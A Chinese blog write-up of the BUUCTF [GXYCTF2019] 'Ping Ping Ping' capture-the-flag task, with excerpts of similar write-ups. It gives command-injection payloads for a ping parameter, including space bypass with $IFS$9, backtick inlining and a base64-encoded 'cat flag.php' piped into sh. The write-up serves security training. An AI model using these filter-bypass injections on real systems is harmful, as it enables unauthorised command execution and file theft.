【BUUCTF】[GXYCTF2019]Ping Ping Ping 1

最新推荐文章于 2025-10-30 11:19:21 发布
原创 最新推荐文章于 2025-10-30 11:19:21 发布 · 373 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #linux #开发语言

本文介绍了一种绕过网站文件名过滤的方法,通过使用特殊字符和编码技巧,成功访问被过滤的flag文件。文章详细展示了如何利用$IFS变量和base64编码来规避常见的安全限制。

在这里插入图片描述在这里插入图片描述列出当前目录下的文件
?ip=1;ls
在这里插入图片描述那么我们就要打开flag.php文件
在这里插入图片描述
发现过滤了空格
经过测试我们发现$IFS$9 可以绕过空格
在这里插入图片描述又发现它绕过了flag
我们先看看index.php
在这里插入图片描述
得知flag的过滤方式
我们可以采用base64方法编码方式绕过
需要执行的命令:

cat$IFS$9flag.php

编码后:

Y2F0JElGUyQ5ZmxhZy5waHA=

so, payload如下

?ip=1;echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh

在这里插入图片描述

BUUCTF [GXYCTF2019]Ping Ping Ping 1
m0_62879498的博客
03-11 6994
[GXYCTF2019]Ping Ping Ping 1 在本题我们考察的是命令执行 已进入本关,我们发现他在询问 ?ip 我们先尝试输入 ?ip=127.0.0.1 发现访问成功 查询一下它的目录: ?ip=127.0.0.1|ls 发现有两个文件夹flag.php,index.php,发现 flag 我们尝试访问 flag。 ?ip=127.0.0.1|cat flag.php 点击查询, 很明显我们需要进行一个空格的过滤 空格过滤常见绕过注释: < > %20(spac
[GXYCTF2019]Ping Ping Ping1
jamesP777的博客
07-17 482
还过滤了flag,我们用字符拼接的方式看能否绕过,a=g;注意这里用分号间隔,所以不能用管道符连接了。可以看到flag了。这里有个坑,这段是纯php代码,所以在页面上没有显示出来,要注意观察界面的源码。既然ls能把flag找出来, 则还可以利用内联的方式获取flag cat$IFS$1`ls`结果应该就在flag.php。基本上可以看到过滤了哪些内容。可以看到过滤了空格,用 $IFS$1替换空格。结合题目名称,考虑是命令注入,试试ls。
[GXYCTF2019]Ping Ping Ping1题解
最新发布
JOY_ZouQY的博客
10-30 608
发现有flag和index两个php文件,那flag多半就在这个flag.php文件里了,那我们直接试试连接这个flag.php呢,/?通过回显结果我们可以看出来,基本上所有符号都被过滤了,所以正常来说的绕过方法都行不通了(像单双引号,bash,字符拼接都不行)PING下面那四行就是返回的结果,有四行是因为一般默认就ping上传四个包,然后底下是丢包率,响应时间等。我们这里输入ls,让它把目录列出来,输入/?回显是正常的,那我们再在ip后面加上一条自己的命令,看能不能执行。
[GXYCTF2019]Ping Ping Ping 1
qq_43618536的博客
07-01 2900
BUUCTF的[GXYCTF2019]Ping Ping Ping
BUUCTF[GXYCTF2019]Ping Ping Ping 1
徐海洋
02-01 486
[GXYCTF2019]Ping Ping Ping 1
[GXYCTF2019]Ping Ping Ping 1-BUUCTF
ZZHow Blog
07-30 1524
本文介绍了命令注入(Command Injection)的漏洞利用方法,以[GXYCTF2019]Ping Ping Ping题目为例。通过观察题目界面发现GET方法存在ip参数,尝试用分号连接命令实现注入。在成功执行ls命令发现flag.php后,尝试绕过空格检测(使用$IFS$9)和关键词过滤(使用环境变量拼接)。最终通过开发者工具查看页面源码找到被注释的flag。文章详细展示了命令注入的测试过程和绕过技巧。 写于2023/11/15
BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1475
BUUctf [GXYCTF2019]Ping Ping Ping
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 805
题目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
ctf题集【BUUCTF WEB】[GXYCTF2019]Ping Ping Ping 1
qq_42667028的博客
12-19 727
说明空格被限制了,多次尝试发现$IFS$1可以绕过,尝试输入/?发现flag.php在当前目录下,那么就需要查看这个文件,尝试输入/?看来*也被限制了,那么尝试'''、''、\、$1、都无法绕过,换个思路,用base64绕过。flag也被限制了,那么尝试/?cat$IFS$1fla*尝试能否用管道符执行,输入参数/?ip=127.0.0.1后成功执行。
BUUCTF—[GXYCTF2019]Ping Ping Ping1
qq_57778984的博客
10-22 543
内联绕过就是将反引号内命令的输出结果作为另一个命令的输入来执行,比如系统对flag字符进行了过滤,但是单独使用ls命令时又会回显出index.php和flag.php文件,那么我们可以通过ls命令将index.php和flag.php作为输入,通过cat查看两个文件获取flag,而不用输入cat flag.php触发关键词。3.尝试在执行ping命令后执行其他命令,用";连接两个命令时,第二个命令只有在第一个命令执行成功的情况下才会执行。连接两个命令时,第二个命令只有在第一个命令执行失败的情况下才会执行。
BUUCTF-[GXYCTF2019]Ping Ping Ping1
Monica的博客
09-13 730
目录 题目:​ 分析: 方法: 方法1: 方法2: 方法3: 题目: 提示get传入一个ip的值,猜测是exec函数执行一个外部程序。 分析: 使用;同时执行前面和后面的命令 相关知识点 payload:?ip=127.0.0.1;ls 发现flag payload:?ip=127.0.0.1;tac flag.php 通过测试发现,过滤了空格、<、>、{、}、flag、*、?、'、"、)、[、]、/等 在linux 空格可以用以下字符串...
buuctf [GXYCTF2019]Ping Ping Ping
03-28
### BUUCTF GXYCTF2019 Ping Ping Ping Writeup 解题思路 该题目属于命令执行绕过类题目,主要考察选手对于PHP代码中的输入验证机制以及Linux命令执行的理解。以下是详细的解题分析: #### 题目背景 通过提供的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值